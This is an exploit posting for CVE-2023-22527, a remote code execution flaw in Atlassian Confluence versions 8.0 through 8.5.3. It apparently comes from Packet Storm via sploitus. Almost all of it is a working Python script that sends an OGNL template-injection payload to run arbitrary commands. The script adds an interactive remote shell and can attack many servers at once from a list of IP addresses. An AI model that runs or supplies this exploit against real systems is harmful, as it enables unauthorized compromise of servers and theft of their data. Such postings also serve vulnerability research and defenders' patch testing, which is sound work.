Share
## https://sploitus.com/exploit?id=PACKETSTORM:177643
# Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability  
# Date: 25/1/2024  
# Exploit Author: MaanVader  
# Vendor Homepage: https://www.atlassian.com/software/confluence  
# Software Link: https://www.atlassian.com/software/confluence  
# Version: 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3  
# Tested on: 8.5.3  
# CVE : CVE-2023-22527  
  
  
  
import requests  
import argparse  
import urllib3  
from prompt_toolkit import PromptSession  
from prompt_toolkit.formatted_text import HTML  
from rich.console import Console  
  
# Disable SSL warnings  
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  
  
# Argument parsing  
parser = argparse.ArgumentParser(description="Send a payload to Confluence servers.")  
parser.add_argument("-u", "--url", help="Single Confluence Server URL")  
parser.add_argument("-f", "--file", help="File containing list of IP addresses")  
parser.add_argument("-c", "--command", help="Command to Execute")  
parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL")  
args = parser.parse_args()  
  
# Rich console for formatted output  
console = Console()  
  
# Function to send payload  
def send_payload(url, command):  
headers = {  
'Connection': 'close',  
'Content-Type': 'application/x-www-form-urlencoded'  
}  
payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'  
'&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n')  
headers['Content-Length'] = str(len(payload))  
  
full_url = f"{url}/template/aui/text-inline.vm"  
response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False)  
return response.text.split('<!DOCTYPE html>')[0].strip()  
  
# Interactive shell function  
def interactive_shell(url):  
session = PromptSession()  
console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]")  
while True:  
try:  
cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>"))  
if cmd.lower() in ["exit", "quit"]:  
break  
response = send_payload(url, cmd)  
console.print(response)  
except KeyboardInterrupt:  
break  
except Exception as e:  
console.print(f"[bold red]Error: {e}[/bold red]")  
break  
  
# Process file function  
def process_file(file_path):  
with open(file_path, 'r') as file:  
for line in file:  
ip = line.strip()  
url = f"http://{ip}:8090"  
console.print(f"Processing {url}")  
print(send_payload(url, args.command))  
  
# Main execution logic  
if args.shell and args.url:  
interactive_shell(args.url)  
elif args.url and args.command:  
print(send_payload(args.url, args.command))  
elif args.file and args.command:  
process_file(args.file)  
else:  
print("Error: Please provide a valid URL and a command or use the interactive shell option.")